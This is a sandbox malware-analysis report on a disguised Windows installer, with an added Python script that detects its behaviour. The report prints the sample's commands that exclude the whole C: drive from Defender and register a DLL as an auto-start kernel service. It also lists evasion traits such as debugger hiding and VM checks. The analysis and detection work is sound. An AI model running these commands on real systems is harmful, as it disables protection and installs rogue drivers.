Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC60181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (reported 2 times)
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_008457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC69D66 mov eax, dword ptr fs:[00000030h] (reads the PEB pointer from the TEB)
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC69D35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC5F17D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CC58CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (reported 2 times)
Source: tProtect.dll.12.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (reported 31 times)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
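Two command lines in this section carry the whole evasion story: the Defender exclusion for the entire C: drive, and the sc create with type= kernel whose binPath is a .dll under Program Files (x86)\Windows NT rather than a .sys under System32\drivers (followed by 31 attempts to start it). The following is an added example, not code from the Joe Sandbox report or from the sample: a Python detector for process-creation command lines that parses sc.exe's "key= value" syntax, checks kernel-service binPaths, and looks for Add-MpPreference exclusions both in clear text and behind a base64 -EncodedCommand (the same case the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule in the overview targets). Lines 0 and 3 of the sample are the two command lines from this report; the other sample lines are constructed, and the rule names are the example's own.

```python
"""Detect a kernel-mode service whose binPath is not a .sys under System32/drivers, and
a Defender exclusion for a whole drive, also when hidden behind -EncodedCommand.
Added example with constructed sample lines; rule names are the example's own."""
import base64
import ntpath
import re

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus -ec.
_ENC_FLAGS = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_ENC_FLAGS))
_EXCL_RE = re.compile(r"""(?i)Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+(?:'([^']*)'|"([^"]*)"|(\S+))""")
_DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")


def split_cmdline(cmdline):
    """Whitespace split honouring double quotes (simplified CommandLineToArgvW, no
    backslash escapes; enough for sc.exe and powershell.exe command lines)."""
    tokens, cur, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_sc_create(cmdline):
    """Parse `sc create <name> key= value ...` into a dict, or None if not an sc create."""
    argv = split_cmdline(cmdline)
    if len(argv) < 3 or ntpath.basename(argv[0]).lower() not in ("sc", "sc.exe"):
        return None
    if argv[1].lower() != "create":
        return None
    params, i = {"name": argv[2]}, 3
    while i < len(argv):
        if argv[i].endswith("=") and i + 1 < len(argv):   # sc.exe syntax: "key= value"
            params[argv[i][:-1].lower()] = argv[i + 1]
            i += 2
        else:
            i += 1
    return params


def check_kernel_service(params):
    """kernel/filesys drivers are expected to be .sys files in the drivers directory;
    the second rule is lower confidence because some vendor drivers live elsewhere."""
    findings = []
    if params.get("type", "").lower() not in ("kernel", "filesys"):
        return findings
    path = params.get("binpath", "").strip().lower().replace("/", "\\")
    if path.startswith("\\??\\"):
        path = path[4:]
    if ntpath.splitext(path)[1] != ".sys":
        findings.append("kernel_service_non_sys_binpath")
    if "\\system32\\drivers\\" not in path and not path.startswith("system32\\drivers\\"):
        findings.append("kernel_service_outside_drivers_dir")
    return findings


def decode_encoded_command(cmdline):
    """UTF-16LE text behind -EncodedCommand, or None if absent or malformed."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_defender_exclusion(text, encoded=False):
    """Add-MpPreference exclusions; a drive-root path exclusion blinds Defender to
    effectively the whole machine."""
    findings = []
    for m in _EXCL_RE.finditer(text):
        kind = m.group(1).lower()
        value = next(g for g in m.groups()[1:] if g is not None)
        findings.append("defender_exclusion_%s_added" % kind)
        if kind == "path" and _DRIVE_ROOT_RE.match(value.strip()):
            findings.append("defender_exclusion_drive_root")
    if findings and encoded:
        findings.append("defender_cmdlet_in_encoded_command")
    return findings


def analyze_command_line(cmdline):
    """All rule names that fire for one process-creation command line."""
    findings = []
    params = parse_sc_create(cmdline)
    if params:
        findings += check_kernel_service(params)
    findings += check_defender_exclusion(cmdline)
    decoded = decode_encoded_command(cmdline)
    if decoded:
        findings += check_defender_exclusion(decoded, encoded=True)
    return findings


def scan(lines):
    """Map line index -> findings for every line that triggers at least one rule."""
    return {i: f for i, f in ((i, analyze_command_line(l)) for i, l in enumerate(lines)) if f}


# Constructed sample: lines 0 and 3 are from this report; the rest are made up for contrast
# (a benign driver install, the same exclusion base64-encoded, and a narrower exclusion).
_ENC_PAYLOAD = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\'".encode("utf-16-le")).decode()
SAMPLE_LINES = [
    "sc create CleverSoar displayname= CleverSoar binPath= \"C:\\Program Files (x86)\\Windows NT\\tProtect.dll\" type= kernel start= auto",
    "sc start CleverSoar",
    "sc create vdrv binPath= \"C:\\Windows\\System32\\drivers\\vdrv.sys\" type= kernel start= demand",
    "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"",
    "powershell.exe -NoProfile -enc " + _ENC_PAYLOAD,
    "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\Program Files\\Vendor\\App'\"",
]
```

Run it as `scan(SAMPLE_LINES)`: line 0 fires both kernel-service rules, line 3 and the encoded line 4 fire the drive-root rule (line 4 additionally the encoded-command marker), line 5 only the generic exclusion rule, and the sc start and the benign .sys install fire nothing. On a real host the same two checks can be made against the service registry and Get-MpPreference output rather than against command lines, but the command-line form is what process-creation telemetry gives you at the moment this installer runs.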
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 6_2_6CD27700 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (reported 6 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (reported 3 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007CAB2A GetSystemTimeAsFileTime,10_2_007CAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00860090 GetVersion,10_2_00860090
MITRE ATT&CK Matrix (one line per tactic; the numbers shown in the original matrix next to a technique are kept in square brackets):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation [2]; Command and Scripting Interpreter [2]; Service Execution [1]; Native API [1]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Access Token Manipulation [1]; Windows Service [1]; Process Injection [111]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [11]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [241]; Access Token Manipulation [1]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; Security Software Discovery [431]; Virtualization/Sandbox Evasion [241]; Process Discovery [2]; Application Window Discovery [1]; System Owner/User Discovery [2]; File and Directory Discovery [3]; System Information Discovery [45]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1580230
Sample: #U5b89#U88c5#U52a9#U624b1.0.3.exe
Start date: 24/12/2024
Architecture: WINDOWS
Score: 92

Signatures attached to the start node:
  • Multi AV Scanner detection for dropped file
  • Multi AV Scanner detection for submitted file
  • Found driver which could be used to inject code into processes
  • 2 other signatures

Process tree as drawn in the behavior graph (node numbers from the graph; badge numbers shown next to a process in the graph are kept in square brackets; "dropped" lines are files written by that process):
  • 2: Start
    • 11: #U5b89#U88c5#U52a9#U624b1.0.3.exe [2] started
      dropped (105): C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32
      • 20: #U5b89#U88c5#U52a9#U624b1.0.3.tmp [3 5] started
        dropped (91): C:\Users\user\AppData\Local\...\update.vac, PE32
        dropped (93): C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
        signature (115): Adds a directory exclusion to Windows Defender
        • 36: #U5b89#U88c5#U52a9#U624b1.0.3.exe [2] started
          dropped (95): C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32
          • 56: #U5b89#U88c5#U52a9#U624b1.0.3.tmp [4 16] started
            dropped (97): C:\Users\user\AppData\Local\...\update.vac, PE32
            dropped (99): C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32
            dropped (101): C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
            dropped (103): C:\Program Files (x86)\Windows NT\7zr.exe, PE32
            signature (119): Query firmware table information (likely to detect VMs)
            signature (121): Protects its processes via BreakOnTermination flag
            signature (123): Hides threads from debuggers
            signature (125): Contains functionality to hide a thread from the debugger
            • 64: 7zr.exe [2] started
              dropped (89): C:\Program Files (x86)\...\tProtect.dll, PE32+
              • 73: conhost.exe started
            • 67: cmd.exe started
              • 75: sc.exe [1] started
                • 83: conhost.exe started
            • 69: cmd.exe started
              • 77: sc.exe started
                • 85: conhost.exe started
            • 71: 2 other processes
              • 79: sc.exe started
                • 87: conhost.exe started
              • 81: conhost.exe started
        • 39: powershell.exe [23] started
          signature (117): Loading BitLocker PowerShell Module
          • 60: conhost.exe started
          • 62: WmiPrvSE.exe started
    • 14: cmd.exe started
      • 24: sc.exe [1] started
        • 42: conhost.exe started
    • 16: cmd.exe started
      • 26: sc.exe [1] started
        • 44: conhost.exe started
    • 18: 28 other processes
      • 28: sc.exe [1] started
        • 46: conhost.exe started
      • 30: sc.exe [1] started
        • 48: conhost.exe started
      • 32: sc.exe [1] started
        • 50: conhost.exe started
      • 34: 24 other processes
        • 52: conhost.exe started
        • 54: 23 other processes

Antivirus detection, submitted file:

Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b1.0.3.exe | 0% | ReversingLabs
#U5b89#U88c5#U52a9#U624b1.0.3.exe | 7% | Virustotal

Antivirus detection, dropped files:

Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal
C:\Program Files (x86)\Windows NT\hrsw.vbc | 15% | Virustotal
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 6% | Virustotal
C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
URLs found in memory or binary data:

Name | Source | Malicious | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdline | SetupU#U5b89#U88c5#U52a9#U624b1.0.3.exe | false | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108961550.000000007F95B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108604500.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2110772600.0000000000251000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000000.2123660203.00000000006CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.dr | false | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108961550.000000007F95B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2108604500.0000000002F90000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2110772600.0000000000251000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000006.00000000.2123660203.00000000006CD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.5.dr | false | high
        No contacted IP infos
General information:

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580230
Start date and time: 2024-12-24 04:52:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b1.0.3.exe (renamed because the original name is a hash value)
Original Sample Name: 1.0.3.exe
Detection: MAL
Classification: mal92.evad.winEXE@137/33@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 28
• Number of non-executed functions: 75
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.85.23.206, 13.107.246.63
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Simulations:

Time | Type | Description
22:52:56 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b1.0.3.tmp modified
22:52:59 | API Interceptor | 24x Sleep call for process: powershell.exe modified
        No context
        No context
        No context
        No context
Joe Sandbox View / Context (dropped file matches against earlier analyses):

Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated Sample Name / URL | Detection | Threat Name
#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_2.0.8.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_2.0.8.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_2.0.6.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_2.0.6.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown
#U5b89#U88c5#U52a9#U624b_2.0.5.exe | malicious | Unknown

Dropped files (one record per file, as listed in the report):

Process: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8 bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
File Type: data
Category: dropped
Size (bytes): 2054096
Entropy (8 bit): 7.999911973951703
Encrypted: true
SSDEEP: 49152:1Z9WsDkMA2WvV8z2sg8QfBFPLhxaUAdUwRhB5akR2zrvkOWCgUc:1Z8s9A/QghFzWd37B5RIrY7h
MD5: 310C3D7BE8A2AE42D4AB349F9F46F46C
SHA1: 82A78D2C76591A09B354C51E1A2BCF73AD8A4FD8
SHA-256: 20969AD745814479F39CECD7725608821A07D4E5299DCEDC74642604E6481B9E
SHA-512: 2091FC678994C30ACED6105A5D006B1EA7B6B683AF6B723F88AB65B30701174A36B9BA7730E6DD912E88F1781BFEC0F0D9AD7B526191BC214A2D87D5EBA5EE5C
Malicious: false
Preview: .@S.....6...................!Z...;o..!5.G3...?.... ......i....v...p......*]..b....l...J..J?.. .5...m.u......]............%;..L......'..@.Mt....-......x.{.D.8".Nnn6C.bh*S}y..Z?21*B.....WUCrz.+.<#.W.B/.1.j:...%..+..M]..w...t.^...zb.o..c.(.........K..|j..}>.ciK...Z..k.T..co....}..m:.+A.F...;...JT....]...[....>W...2......8..~s0.Dj...........K.+Is..{.v:.......!...].....g7..EDf+G.....w.+.Y.m.z..).7..?%..{d.Y.&.)s..+bH..+..P'.$..gS*h....G...1|{..t...y.m.9...3m...u..|.e...PVC3..T\....-....._(.K....I.l.;+...Y;*.....9Gj..9..h..kwA.8........bf.)\..0..N..VE.bX.>#.....i..._..U..x....m......pE..e%......l.kY..a.Y1$..z..5._NPB.<...w......(.>30U.........%...._.X....zd..[.{...A.U....3...:..t..._l\{.|}&.../.U..4}:.-...%(.'sZabL..t8...j..9.),....N.yP....a...~&1........fDS5...7.z$6...... .[I]........9..S.7_...y.d.6... .M..z...az..8...+?._..ib...M...^P}vM3...\!..;.O.}...*... Zp#)..r..l.#..3...F.K..B..2kbr.....y..:.=...\. ........`Z..u.R....8...c..e.f.T

Process: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3606528
Entropy (8 bit): 7.005604268954487
Encrypted: false
SSDEEP: 98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
MD5: 1047AF726D2E233D71934EF55E635C4A
SHA1: AB12E827E4E57DEA2E885733F0C48E9A83756678
SHA-256: 42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
SHA-512: 8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
Malicious: true
Antivirus:
• Antivirus: Virustotal, Detection: 15%
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
File Type: data
Category: dropped
Size (bytes): 2054096
Entropy (8 bit): 7.999911973951703
Encrypted: true
SSDEEP: 49152:1Z9WsDkMA2WvV8z2sg8QfBFPLhxaUAdUwRhB5akR2zrvkOWCgUc:1Z8s9A/QghFzWd37B5RIrY7h
MD5: 310C3D7BE8A2AE42D4AB349F9F46F46C
SHA1: 82A78D2C76591A09B354C51E1A2BCF73AD8A4FD8
SHA-256: 20969AD745814479F39CECD7725608821A07D4E5299DCEDC74642604E6481B9E
SHA-512: 2091FC678994C30ACED6105A5D006B1EA7B6B683AF6B723F88AB65B30701174A36B9BA7730E6DD912E88F1781BFEC0F0D9AD7B526191BC214A2D87D5EBA5EE5C
Malicious: false
